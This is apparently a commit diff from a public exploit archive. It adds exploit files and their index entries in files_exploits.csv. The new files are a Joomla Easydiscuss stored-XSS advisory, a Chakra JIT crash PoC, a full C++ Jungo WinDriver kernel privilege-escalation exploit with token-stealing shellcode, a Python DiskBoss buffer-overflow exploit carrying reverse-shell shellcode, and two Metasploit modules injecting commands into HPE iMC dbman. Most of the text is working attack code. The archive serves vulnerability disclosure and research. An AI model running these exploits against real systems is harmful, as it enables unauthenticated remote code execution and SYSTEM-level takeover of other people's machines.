<input type="text" name="addon" value="https://downloads.wordpress.org/plugin/bbpress.2.5.13.zip">
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```
Solution
--------
Update to version 2.9.61.
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-14**: Tried to reach out to vendor using support email address
3. **2017-12-16**: Vendor replied
4. **2017-12-16**: Vendor received details
5. **2017-12-21**: Vendor released a fix

21
exploits/php/webapps/43488.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
# Date: 06-01-2018
# Software Link: https://stackideas.com/easydiscuss
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-5263
# Category: webapps
1. Description
Whenever a user edits a message with <\textarea> inside the body, everything after the <\textarea> will be executed in the users browser. Works with every version up to 4.0.20
2. Proof of Concept
Login with permissions to post a message, insert <\textarea> in the body and add any html code after that, whenever a user tries to edit that message the code writed after you closed the textarea will be executed
3. Solution:
Update to version 4.0.21
https://stackideas.com/blog/easydiscuss4021-update

28
exploits/windows/dos/43491.js Normal file
View file

@ -0,0 +1,28 @@
/*
The method "Lowerer::LowerSetConcatStrMultiItem" is used to generate machine code to concatenate strings.
Here's a snippet of the method.
void Lowerer::LowerSetConcatStrMultiItem(IR::Instr * instr)
{
...
IR::IndirOpnd * dstLength = IR::IndirOpnd::New(concatStrOpnd, Js::ConcatStringMulti::GetOffsetOfcharLength(), TyUint32, func);
...
InsertAdd(false, dstLength, dstLength, srcLength, instr); <<------ (a)
...
}
At (a), there's no check for integer overflow.
Note: Chakra uses string chains to handle concatenated strings(the ConcatString class). So it doesn't require much memory to trigger the bug.
PoC:
*/
let a = '';
let b = 'A'.repeat(0x10000);
for (let i = 0; i < 0x10000; i++) {
a = 'BBBBBBBBB' + a + b;
}
print(a.length);
print(b.length);
print(a[0]);

322
exploits/windows/local/43494.cpp Normal file
View file

@ -0,0 +1,322 @@
// ConsoleApplication1.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#define device L"\\\\.\\WINDRVR1251"
#define SPRAY_SIZE 30000
typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG AllocationSize,
ULONG AllocationType,
ULONG Protect
);
// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token
#define SYSTEM_PID 0x004 // SYSTEM Process PID
/*
* The caller expects to call a cdecl function with 4 (0x10 bytes) arguments.
*/
__declspec(naked) VOID TokenStealingShellcode() {
__asm {
hasRun:
xor eax, eax; Set zero
cmp byte ptr [eax], 1; If this is 1, we have already run this code
jz End;
mov byte ptr [eax], 1; Indicate that this code has been hit already
; initialize
mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process
mov ecx, eax; Copy current _EPROCESS structure
mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4
; begin system token search loop
SearchSystemPID :
mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, FLINK_OFFSET
cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM to current process
End :
ret 0x10; cleanup for cdecl
}
}
BOOL map_null_page()
{
/* Begin NULL page map */
HMODULE hmodule = LoadLibraryA("ntdll.dll");
if (hmodule == INVALID_HANDLE_VALUE)
{
printf("[x] Couldn't get handle to ntdll.dll\n");
return FALSE;
}
PNtAllocateVirtualMemory AllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hmodule, "NtAllocateVirtualMemory");
if (AllocateVirtualMemory == NULL)
{
printf("[x] Couldn't get address of NtAllocateVirtualMemory\n");
return FALSE;
}
SIZE_T size = 0x1000;
PVOID address = (PVOID)0x1;
NTSTATUS allocStatus = AllocateVirtualMemory(GetCurrentProcess(),
&address,
0,
&size,
MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
PAGE_EXECUTE_READWRITE);
if (allocStatus != 0)
{
printf("[x] Error mapping null page\n");
return FALSE;
}
printf("[+] Mapped null page\n");
return TRUE;
}
/*
* Continually flip the size
* @Param user_size - a pointer to the user defined size
*/
DWORD WINAPI flip_thread(LPVOID user_size)
{
printf("[+] Flipping thread started\n");
while (TRUE)
{
*(ULONG *)(user_size) ^= 10; //flip between 0x52 and 0x58, giving a 0x40 byte overflow.
}
return 0;
}
DWORD WINAPI ioctl_thread(LPVOID user_buff)
{
char out_buff[40];
DWORD bytes_returned;
HANDLE hdevice = CreateFile(device,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0
);
if (hdevice == INVALID_HANDLE_VALUE)
{
printf("[x] Couldn't open device\n");
}
NTSTATUS ret = DeviceIoControl(hdevice,
0x95382623,
user_buff,
0x1000,
out_buff,
40,
&bytes_returned,
0);
CloseHandle(hdevice);
return 0;
}
void spray_pool(HANDLE handle_arr[])
{
//create SPRAY_SIZE event objects filling up the pool
for (int i = 0; i < SPRAY_SIZE; i++)
{
handle_arr[i] = CreateEvent(NULL, 0, NULL, L"");
}
for (int i = 0; i < SPRAY_SIZE; i+=50)
{
for (int j = 0; j < 14 && j + i < SPRAY_SIZE; j++)
{
CloseHandle(handle_arr[j + i]);
handle_arr[j + i] = 0;
}
}
}
void free_events(HANDLE handle_arr[])
{
for (int i = 0; i < SPRAY_SIZE; i++)
{
if (handle_arr[i] != 0)
{
CloseHandle(handle_arr[i]);
}
}
}
BOOL check_priv_count(DWORD old_count, PDWORD updated_count)
{
HANDLE htoken;
DWORD length;
DWORD temp;
DWORD new_count;
PTOKEN_PRIVILEGES current_priv = NULL;
if (!OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &htoken))
{
printf("[x] Couldn't get current token\n");
return FALSE;
}
//get the size required for the current_priv allocation
GetTokenInformation(htoken, TokenPrivileges, current_priv, 0, &length);
//allocate memory for the structure
current_priv = (PTOKEN_PRIVILEGES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);
//get the actual token info
GetTokenInformation(htoken, TokenPrivileges, current_priv, length, &length);
new_count = current_priv->PrivilegeCount;
HeapFree(GetProcessHeap(), 0, current_priv);
CloseHandle(htoken);
temp = old_count; //store the old count
*updated_count = new_count; //update the count
if (new_count > old_count)
{
printf("[+] We now have %d privileges\n", new_count);
return TRUE;
}
else
return FALSE;
}
int main()
{
HANDLE h_flip_thread;
HANDLE h_ioctl_thread;
HANDLE handle_arr[SPRAY_SIZE] = { 0 };
DWORD mask = 0;
DWORD orig_priv_count = 0;
char *user_buff;
check_priv_count(-1, &orig_priv_count);
printf("[+] Original priv count: %d\n", orig_priv_count);
if (!map_null_page())
{
return -1;
}
*(ULONG *)0x74 = (ULONG)&TokenStealingShellcode;
user_buff = (char *)VirtualAlloc(NULL,
0x1000,
MEM_COMMIT | MEM_RESERVE,
PAGE_NOCACHE | PAGE_READWRITE);
if (user_buff == NULL)
{
printf("[x] Couldn't allocate memory for buffer\n");
return -1;
}
memset(user_buff, 0x41, 0x1000);
*(ULONG *)(user_buff + 0x34) = 0x00000052; //set the size initially to 0x51
//pool header block
*(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
*(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag
//QuotaInfo block
*(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
*(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
*(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
*(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock
//Event header block
*(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
*(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
*(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
*(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
*(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
*(ULONG *)(user_buff + 0x400) = 0x00000000;
*(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged
/*
* create a suspended thread for flipping, passing in a pointer to the size at user_buff+0x34
* Set its priority to highest.
* Set its mask so that it runs on a particular core.
*/
h_flip_thread = CreateThread(NULL, 0, flip_thread, user_buff + 0x34, CREATE_SUSPENDED, 0);
SetThreadPriority(h_flip_thread, THREAD_PRIORITY_HIGHEST);
SetThreadAffinityMask(h_flip_thread, 0);
ResumeThread(h_flip_thread);
printf("[+] Starting race...\n");
spray_pool(handle_arr);
while (TRUE)
{
h_ioctl_thread = CreateThread(NULL, 0, ioctl_thread, user_buff, CREATE_SUSPENDED, 0);
SetThreadPriority(h_ioctl_thread, THREAD_PRIORITY_HIGHEST);
SetThreadAffinityMask(h_ioctl_thread, 1);
ResumeThread(h_ioctl_thread);
WaitForSingleObject(h_ioctl_thread, INFINITE);
free_events(handle_arr); //free the event objects
if (check_priv_count(orig_priv_count, &orig_priv_count))
{
printf("[+] Breaking out of loop, popping shell!\n");
break;
}
//pool header block
*(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
*(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag
//QuotaInfo block
*(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
*(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
*(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
*(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock
//Event header block
*(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
*(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
*(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
*(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
*(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
*(ULONG *)(user_buff + 0x400) = 0x00000000;
*(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged
spray_pool(handle_arr);
}
system("cmd.exe");
return 0;
}

20
exploits/windows/remote/43408.py
View file

@ -1,3 +1,5 @@
#!/usr/bin/pythion
# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
# CVE: CVE-2017-17968
# Date: 28-12-2017
@ -8,12 +10,12 @@
# Category: webapps
# Impact: Code execution
1. Description
A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
2. Proof of Concept
#1. Description
#
#A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
#
#2. Proof of Concept
#
#!/usr/bin/pythion
@ -114,6 +116,6 @@ if __name__ == '__main__':
3. Solution:
No solution available at the moment.
#3. Solution:
#
#No solution available at the moment.

105
exploits/windows/remote/43478.py Executable file
View file

@ -0,0 +1,105 @@
# Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
# Date: 2017-08-27
# Exploit Author: Arris Huijgen
# Vendor Homepage: http://www.diskboss.com/
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
# Version: Through 8.8.16
# Tested on: Windows 7 SP1 x64, Windows XP SP3 x86
# CVE: CVE-2018-5262
# Usage
# 1. Update the Target section
# 2. Update the shellcode
# 3. Launch!
import socket
from struct import pack
# Software editions (port, offset)
free8416 = (8096, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
pro8416 = (8097, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
ult8416 = (8098, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
srv8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8512 = (8094, 0x100180ee) # ADD ESP,8 | RET 0x04 @ libpal.dll
free8816 = (8096, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
pro8816 = (8097, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
ult8816 = (8098, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
srv8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
# Target
host = '127.0.0.1'
(port, addr) = ent8816
def main():
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print '[+] Connected to %s:%d' % (host, port)
# Memory
size = 1000
offset = 128
# Payload
preret = '\xEB\x06\x90\x90' # JMP 0x06
ret = pack('<I', addr) # Depending on the software edition
pivot = '\xe9\x3f\xfb\xff\xff' # JMP -0x4BC
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1234 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b '\x00'
# Payload size: 351 bytes
sc = (
"\xb8\x80\xac\x48\x8f\xd9\xc4\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x52\x31\x45\x12\x03\x45\x12\x83\x45\xa8\xaa\x7a\xb9\x59\xa8"
"\x85\x41\x9a\xcd\x0c\xa4\xab\xcd\x6b\xad\x9c\xfd\xf8\xe3\x10"
"\x75\xac\x17\xa2\xfb\x79\x18\x03\xb1\x5f\x17\x94\xea\x9c\x36"
"\x16\xf1\xf0\x98\x27\x3a\x05\xd9\x60\x27\xe4\x8b\x39\x23\x5b"
"\x3b\x4d\x79\x60\xb0\x1d\x6f\xe0\x25\xd5\x8e\xc1\xf8\x6d\xc9"
"\xc1\xfb\xa2\x61\x48\xe3\xa7\x4c\x02\x98\x1c\x3a\x95\x48\x6d"
"\xc3\x3a\xb5\x41\x36\x42\xf2\x66\xa9\x31\x0a\x95\x54\x42\xc9"
"\xe7\x82\xc7\xc9\x40\x40\x7f\x35\x70\x85\xe6\xbe\x7e\x62\x6c"
"\x98\x62\x75\xa1\x93\x9f\xfe\x44\x73\x16\x44\x63\x57\x72\x1e"
"\x0a\xce\xde\xf1\x33\x10\x81\xae\x91\x5b\x2c\xba\xab\x06\x39"
"\x0f\x86\xb8\xb9\x07\x91\xcb\x8b\x88\x09\x43\xa0\x41\x94\x94"
"\xc7\x7b\x60\x0a\x36\x84\x91\x03\xfd\xd0\xc1\x3b\xd4\x58\x8a"
"\xbb\xd9\x8c\x1d\xeb\x75\x7f\xde\x5b\x36\x2f\xb6\xb1\xb9\x10"
"\xa6\xba\x13\x39\x4d\x41\xf4\x39\x92\x49\x05\xae\x90\x49\x01"
"\xfc\x1c\xaf\x63\x10\x49\x78\x1c\x89\xd0\xf2\xbd\x56\xcf\x7f"
"\xfd\xdd\xfc\x80\xb0\x15\x88\x92\x25\xd6\xc7\xc8\xe0\xe9\xfd"
"\x64\x6e\x7b\x9a\x74\xf9\x60\x35\x23\xae\x57\x4c\xa1\x42\xc1"
"\xe6\xd7\x9e\x97\xc1\x53\x45\x64\xcf\x5a\x08\xd0\xeb\x4c\xd4"
"\xd9\xb7\x38\x88\x8f\x61\x96\x6e\x66\xc0\x40\x39\xd5\x8a\x04"
"\xbc\x15\x0d\x52\xc1\x73\xfb\xba\x70\x2a\xba\xc5\xbd\xba\x4a"
"\xbe\xa3\x5a\xb4\x15\x60\x7a\x57\xbf\x9d\x13\xce\x2a\x1c\x7e"
"\xf1\x81\x63\x87\x72\x23\x1c\x7c\x6a\x46\x19\x38\x2c\xbb\x53"
"\x51\xd9\xbb\xc0\x52\xc8"
)
# Compile payload
fill = 'A' * (offset - len(preret))
code = fill + preret + ret + pivot
nops = '\x90' * (size - len(code) - len(sc) - 100)
payload = code + nops + sc + 'C' * 100
# Compile message
msg = (
'\x75\x19\xba\xab' +
'\x03\x00\x00\x00' +
'\x00\x40\x00\x00' +
pack('<I', len(payload)) +
pack('<I', len(payload)) +
pack('<I', ord(payload[-1])) +
payload
)
# Send message
s.send(msg)
print '[+] Exploit sent!'
if __name__ == '__main__':
main()

207
exploits/windows/remote/43492.rb Executable file
View file

@ -0,0 +1,207 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'HPE iMC dbman RestoreDBase Unauthenticated RCE',
'Description' => %q{
This module exploits a remote command execution vulnerablity in
Hewlett Packard Enterprise Intelligent Management Center before
version 7.3 E0504P04.
The dbman service allows unauthenticated remote users to restore
a user-specified database (OpCode 10007), however the database
connection username is not sanitized resulting in command injection,
allowing execution of arbitrary operating system commands as SYSTEM.
This service listens on TCP port 2810 by default.
This module has been tested successfully on iMC PLAT v7.2 (E0403)
on Windows 7 SP1 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'sztivi', # Discovery
'Chris Lyne', # Python PoC (@lynerc)
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['CVE', '2017-5817'],
['EDB', '43195'],
['ZDI', '17-341'],
['URL', 'https://www.securityfocus.com/bid/98469/info'],
['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
],
'Platform' => 'win',
'Targets' => [['Automatic', {}]],
'Payload' => { 'BadChars' => "\x00" },
'DefaultOptions' => { 'WfsDelay' => 15 },
'Privileged' => true,
'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0))
register_options [Opt::RPORT(2810)]
end
def check
# empty RestoreDBase packet
pkt = [10007].pack('N')
connect
sock.put pkt
res = sock.get_once
disconnect
# Expected reply:
# "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
return CheckCode::Detected if res =~ /dbman/i
CheckCode::Safe
end
def dbman_msg(database_user)
data = ''
db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
database_type = "\x03" # MySQL
restore_type = 'MANUAL'
database_password = rand_text_alpha rand(1..5)
database_port = rand_text_alpha rand(1..5)
database_instance = rand_text_alpha rand(1..5)
junk = rand_text_alpha rand(1..5)
# database ip
data << "\x04"
data << [db_ip.length].pack('C')
data << db_ip
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# junk
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x02\x01\x01"
# database type
data << "\x02"
data << [database_type.length].pack('C')
data << database_type
# restore type
data << "\x04"
data << [restore_type.length].pack('C')
data << restore_type
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# database user
data << "\x04"
data << "\x82"
data << [database_user.length].pack('n')
data << database_user
# database password
data << "\x04"
data << [database_password.length].pack('C')
data << database_password
# database port
data << "\x04"
data << [database_port.length].pack('C')
data << database_port
# database instance
data << "\x04"
data << [database_instance.length].pack('C')
data << database_instance
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x30\x00"
data << "\x02\x01\x01"
data
end
def dbman_restoredbase_pkt(database_user)
data = dbman_msg database_user
# opcode 10007 (RestoreDBase)
pkt = [10007].pack('N')
# packet length
pkt << "\x00\x00"
pkt << [data.length + 4].pack('n')
# packet data length
pkt << "\x30\x82"
pkt << [data.length].pack('n')
# packet data
pkt << data
pkt
end
def execute_command(cmd, _opts = {})
connect
sock.put dbman_restoredbase_pkt "\"& #{cmd} &"
disconnect
end
def exploit
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true, :encode_final_payload => true }
)
if command.length > 8000
fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
end
print_status "Sending payload (#{command.length} bytes)..."
execute_command command
end
end

153
exploits/windows/remote/43493.rb Executable file
View file

@ -0,0 +1,153 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'HPE iMC dbman RestartDB Unauthenticated RCE',
'Description' => %q{
This module exploits a remote command execution vulnerablity in
Hewlett Packard Enterprise Intelligent Management Center before
version 7.3 E0504P04.
The dbman service allows unauthenticated remote users to restart
a user-specified database instance (OpCode 10008), however the
instance ID is not sanitized, allowing execution of arbitrary
operating system commands as SYSTEM. This service listens on
TCP port 2810 by default.
This module has been tested successfully on iMC PLAT v7.2 (E0403)
on Windows 7 SP1 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'sztivi', # Discovery
'Chris Lyne', # Python PoC (@lynerc)
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['CVE', '2017-5816'],
['EDB', '43198'],
['ZDI', '17-340'],
['URL', 'https://www.securityfocus.com/bid/98469/info'],
['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
],
'Platform' => 'win',
'Targets' => [['Automatic', {}]],
'Payload' => { 'BadChars' => "\x00" },
'DefaultOptions' => { 'WfsDelay' => 15 },
'Privileged' => true,
'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0))
register_options [Opt::RPORT(2810)]
end
def check
# empty RestartDB packet
pkt = [10008].pack('N')
connect
sock.put pkt
res = sock.get_once
disconnect
# Expected reply:
# "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
return CheckCode::Detected if res =~ /dbman/i
CheckCode::Safe
end
def dbman_msg(db_instance)
data = ''
db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
db_type = "\x04" # SQL Server
db_sa_username = rand_text_alpha rand(1..5)
db_sa_password = rand_text_alpha rand(1..5)
ora_db_ins = rand_text_alpha rand(1..5)
# dbIp
data << "\x04"
data << [db_ip.length].pack('C')
data << db_ip
# iDBType
data << "\x02"
data << [db_type.length].pack('C')
data << db_type
# dbInstance
data << "\x04"
data << "\x82"
data << [db_instance.length].pack('n')
data << db_instance
# dbSaUserName
data << "\x04"
data << [db_sa_username.length].pack('C')
data << db_sa_username
# dbSaPassword
data << "\x04"
data << [db_sa_password.length].pack('C')
data << db_sa_password
# strOraDbIns
data << "\x04"
data << [ora_db_ins.length].pack('C')
data << ora_db_ins
data
end
def dbman_restartdb_pkt(db_instance)
data = dbman_msg db_instance
# opcode 10008 (RestartDB)
pkt = [10008].pack('N')
# packet length
pkt << "\x00\x00"
pkt << [data.length + 4].pack('n')
# packet data length
pkt << "\x30\x82"
pkt << [data.length].pack('n')
# packet data
pkt << data
pkt
end
def execute_command(cmd, _opts = {})
connect
sock.put dbman_restartdb_pkt "\"& #{cmd} &"
disconnect
end
def exploit
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true, :encode_final_payload => true }
)
if command.length > 8000
fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
end
print_status "Sending payload (#{command.length} bytes)..."
execute_command command
end
end

15
files_exploits.csv
View file

@ -5449,6 +5449,8 @@ id,file,description,date,author,type,platform,port
43454,exploits/windows/dos/43454.py,"DiskBoss Enterprise 8.5.12 - Denial of Service",2018-01-08,"Ahmad Mahfouz",dos,windows,
43456,exploits/windows/dos/43456.txt,"BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC)",2018-01-08,hyp3rlinx,dos,windows,
43471,exploits/windows/dos/43471.cpp,"Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138_ QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure",2018-01-09,"Google Security Research",dos,windows,
43490,exploits/hardware/dos/43490.txt,"Multiple CPUs - Information Leak Using Speculative Execution",2018-01-10,"Google Security Research",dos,hardware,
43491,exploits/windows/dos/43491.js,"Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check",2018-01-10,"Google Security Research",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -9259,6 +9261,7 @@ id,file,description,date,author,type,platform,port
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
43449,exploits/linux/local/43449.rb,"VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)",2018-01-05,Metasploit,local,linux,
43465,exploits/windows/local/43465.txt,"Microsoft Windows - Local XPS Print Spooler Sandbox Escape",2018-01-08,"Google Security Research",local,windows,
43494,exploits/windows/local/43494.cpp,"Jungo Windriver 12.5.1 - Privilege Escalation",2018-01-10,"Fidus InfoSecurity",local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -15909,6 +15912,9 @@ id,file,description,date,author,type,platform,port
43450,exploits/hardware/remote/43450.py,"Cisco IOS - Remote Code Execution",2018-01-05,"Artem Kondratenko",remote,hardware,
43458,exploits/multiple/remote/43458.py,"Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution",2018-01-03,"Kevin Kirsche",remote,multiple,
43472,exploits/windows/remote/43472.rb,"Commvault Communications Service (cvd) - Command Injection (Metasploit)",2018-01-09,Metasploit,remote,windows,8400
43478,exploits/windows/remote/43478.py,"DiskBoss Enterprise 8.8.16 - Buffer Overflow",2018-01-10,"Arris Huijgen",remote,windows,
43492,exploits/windows/remote/43492.rb,"HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
43493,exploits/windows/remote/43493.rb,"HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -25785,6 +25791,7 @@ id,file,description,date,author,type,platform,port
19187,exploits/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,webapps,php,
19188,exploits/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,webapps,php,
19189,exploits/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php,
43474,exploits/php/webapps/43474.rb,"Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)",2018-01-10,"James Bercegay",webapps,php,
43150,exploits/hardware/webapps/43150.html,"Vonage VDV23 - Cross-Site Scripting",2017-11-16,Nu11By73,webapps,hardware,
19263,exploits/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",webapps,hardware,
19264,exploits/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,webapps,php,
@ -37734,6 +37741,14 @@ id,file,description,date,author,type,platform,port
